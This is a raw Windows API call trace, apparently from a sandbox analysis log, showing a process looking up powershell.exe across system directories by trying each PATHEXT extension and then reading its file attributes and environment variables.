	[0358.317] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.317] SetErrorMode (uMode=0x1) returned 0x1
	[0358.317] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.318] SetErrorMode (uMode=0x1) returned 0x1
	[0358.318] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.318] SetErrorMode (uMode=0x1) returned 0x1
	[0358.318] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.318] SetErrorMode (uMode=0x1) returned 0x1
	[0358.318] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.318] SetErrorMode (uMode=0x1) returned 0x1
	[0358.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.319] SetErrorMode (uMode=0x1) returned 0x1
	[0358.319] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.319] SetErrorMode (uMode=0x1) returned 0x1
	[0358.319] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0358.382] SetErrorMode (uMode=0x1) returned 0x1
	[0358.383] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.383] SetErrorMode (uMode=0x1) returned 0x1
	[0358.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.383] SetErrorMode (uMode=0x1) returned 0x1
	[0358.383] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.383] SetErrorMode (uMode=0x1) returned 0x1
	[0358.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.384] SetErrorMode (uMode=0x1) returned 0x1
	[0358.384] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.384] SetErrorMode (uMode=0x1) returned 0x1
	[0358.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.384] SetErrorMode (uMode=0x1) returned 0x1
	[0358.384] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.385] SetErrorMode (uMode=0x1) returned 0x1
	[0358.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.385] SetErrorMode (uMode=0x1) returned 0x1
	[0358.385] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.385] SetErrorMode (uMode=0x1) returned 0x1
	[0358.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.386] SetErrorMode (uMode=0x1) returned 0x1
	[0358.386] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.386] SetErrorMode (uMode=0x1) returned 0x1
	[0358.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.386] SetErrorMode (uMode=0x1) returned 0x1
	[0358.386] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.386] SetErrorMode (uMode=0x1) returned 0x1
	[0358.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.387] SetErrorMode (uMode=0x1) returned 0x1
	[0358.387] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.387] SetErrorMode (uMode=0x1) returned 0x1
	[0358.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.387] SetErrorMode (uMode=0x1) returned 0x1
	[0358.387] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.388] SetErrorMode (uMode=0x1) returned 0x1
	[0358.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.388] SetErrorMode (uMode=0x1) returned 0x1
	[0358.388] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.388] SetErrorMode (uMode=0x1) returned 0x1
	[0358.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.388] SetErrorMode (uMode=0x1) returned 0x1
	[0358.389] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.389] SetErrorMode (uMode=0x1) returned 0x1
	[0358.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.389] SetErrorMode (uMode=0x1) returned 0x1
	[0358.389] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.389] SetErrorMode (uMode=0x1) returned 0x1
	[0358.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.390] SetErrorMode (uMode=0x1) returned 0x1
	[0358.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.390] SetErrorMode (uMode=0x1) returned 0x1
	[0358.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.390] SetErrorMode (uMode=0x1) returned 0x1
	[0358.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.391] SetErrorMode (uMode=0x1) returned 0x1
	[0358.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.391] SetErrorMode (uMode=0x1) returned 0x1
	[0358.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.391] SetErrorMode (uMode=0x1) returned 0x1
	[0358.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0358.391] SetErrorMode (uMode=0x1) returned 0x1
	[0358.391] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.392] SetErrorMode (uMode=0x1) returned 0x1
	[0358.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0358.392] SetErrorMode (uMode=0x1) returned 0x1
	[0358.392] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.392] SetErrorMode (uMode=0x1) returned 0x1
	[0358.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0358.393] SetErrorMode (uMode=0x1) returned 0x1
	[0358.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.393] SetErrorMode (uMode=0x1) returned 0x1
	[0358.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0358.393] SetErrorMode (uMode=0x1) returned 0x1
	[0358.393] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.394] SetErrorMode (uMode=0x1) returned 0x1
	[0358.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0358.394] SetErrorMode (uMode=0x1) returned 0x1
	[0358.394] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.394] SetErrorMode (uMode=0x1) returned 0x1
	[0358.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0358.394] SetErrorMode (uMode=0x1) returned 0x1
	[0358.395] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x46dcc0
	[0358.396] FindNextFileW (in: hFindFile=0x46dcc0, lpFindFileData=0x1c7ad8f0 | out: lpFindFileData=0x1c7ad8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0358.396] FindClose (in: hFindFile=0x46dcc0 | out: hFindFile=0x46dcc0) returned 1
	[0358.396] SetErrorMode (uMode=0x1) returned 0x1
	[0358.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0358.397] SetErrorMode (uMode=0x1) returned 0x1
	[0358.397] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7adc10 | out: lpFileInformation=0x1c7adc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0358.397] SetErrorMode (uMode=0x1) returned 0x1
	[0358.398] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.398] CoTaskMemFree (pv=0x437060) 
	[0358.400] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.400] CoTaskMemFree (pv=0x437060) 
	[0358.403] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.403] CoTaskMemFree (pv=0x437060) 
	[0358.412] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.413] CoTaskMemFree (pv=0x437060) 
	[0358.425] CoTaskMemAlloc (cb=0x3b) returned 0x1b75a3e0
	[0358.426] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7addf8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7addf8) returned 0x4550
	[0358.426] CoTaskMemFree (pv=0x1b75a3e0) 
	[0358.489] GetConsoleWindow () returned 0x10262
	[0358.496] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0358.496] CoTaskMemFree (pv=0x437060) 
	[0358.497] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.497] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0358.497] CoTaskMemFree (pv=0x437060) 
	[0358.504] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0358.504] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0358.504] CoTaskMemFree (pv=0x437060) 
